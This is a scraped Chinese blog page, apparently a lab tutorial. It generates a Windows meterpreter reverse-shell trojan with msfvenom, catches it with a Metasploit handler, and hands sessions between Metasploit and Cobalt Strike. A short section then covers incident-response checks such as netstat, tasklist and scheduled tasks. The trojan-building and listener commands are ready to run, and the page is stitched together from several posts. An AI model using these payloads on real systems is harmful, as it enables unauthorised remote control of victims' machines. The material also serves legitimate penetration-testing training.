赞
踩
CS下载与安装:cobaltstrike的安装与基础使用_cobalt strike windows运行_正经人_____的博客-CSDN博客
环境准备:一台kali,一台靶机(我这里为了简单一点,就用两台虚拟机,你可以在远程服务器部署CS,然后kali中运行MSF(kail自带),最后在找一台靶机)
先使用CS创建一个监听器
随便使用个监听器生成木马并上线就好(使用那个监听器生成木马上线都行,只要能上线)
我这里是在kali中重新打开一个终端(msf是kali自带的)
- msfconsole # 启动 metasploita命令行
- use exploit/multi/handler # 使用模块
- set payload windows/meterpreter/reverse_http # 这里使用的攻击载荷要与CS监听器的相同(名字并不是完全相同,同样是windows的模块 然后最后的协议一样就好reverse_http)
-
- set lhost 192.168.22.145 # 设置监听的ip,要与cs的监听器相同
-
- set lport 6677 # 端口也要与cs监听器端口保持一致
- run # 启动模块
然后回到cs将后门的shell转发一个给msf
大概等一分钟左右就上线了
要使用msf创建木马然后开启监听,再把木马复制到受害者主机中上线
生成木马
- # 攻击载荷 监听ip 监听端口 demo999.exe(生成的文件名)
- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.3 lport=9988 -f exe -o demo999.exe
开启监听
- msfconsole # 启动 metasploita命令行
- use exploit/multi/handler # 使用模块
- set payload windows/x64/meterpreter/reverse_tcp # 这个攻击载荷就是上面我们使用的攻击载荷
- set LHOST 192.168.1.3 # LHOSTS为 listen host (侦听主机)代表你是谁,既kali的IP地址
- set lport 9988 # 就是要在kali上要开启的端口,注意这里的端口要和前面生成木马文件的端口一样
- run # 简单理解就是把鱼钩放到河里
到靶机中执行木马
监听msf的监听情况,成功拿到shell
先background退出会话,查看当前的sessions会话
进入模块exploit/windows/local/payload_inject
,查看需要设置的参数
- use exploit/windows/local/payload_inject # 进入模块
- show options # 查看设置
设置payload,这里的payload需要与cs处监听器设置的协议保持一致
set payload windows/meterpreter/reverse_http
show options查看并设置参数,设置端口,与cs处保持一致,设置lhost为cs服务器的ip地址,载入对应的session会话
- set lport 17822 # 端口需要与cs监听器端口保持一致``
- set lhost 192.168.1.3 # IP设置为msf本地IP,与CS设置保持一致``
- set session 1 # 最开启查看的session的id就是1
run # 最后运行攻击模块
故事回顾:某客户反应自己的网站首页出现被篡改,请求支援
分析:涉及的攻击面 涉及的操作权限 涉及的攻击意图 涉及的攻击方式
netstat -ano
站在攻击者的角度,去分析。攻击者当前拿到哪些权限,网站还是系统权限。装没装杀软,用渗透者的思路去想问题。注重信息搜集,从攻击面入手查看应急响应。
netstat -ano # 查看本机开放的端口
tasklist /svc
之后就可以停止服务并删除文件
p74 应急响应-win&linux 分析后门&勒索病毒&攻击_cs生成linux木马_正经人_____的博客-CSDN博客
p73 应急响应-WEB 分析 php&javaweb&自动化工具_正经人_____的博客-CSDN博客
分析:涉及的攻击面 涉及的操作权限 涉及的攻击意图 涉及的攻击方式
故事回顾:某客户反应服务器异常出现卡顿等情况
思路:利用监控工具分析可疑进程,利用杀毒软件分析可疑文件,利用接口工具抓流量
一般的木马是没有产商信息
但是有些伪装的很好所以这个不能作为我们判断的唯一标准,可以再借助一些其他信息辅助我们进行判断
远程ip
可以在目标主机的命令行查看端口信息
- # 查看本机端口开放信息
- netstat -an
计划任务
系统用户名
还可以借助一些杀毒软件:腾讯、360、火绒这些
我感觉这个软件没有 PCHunter64 好用
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。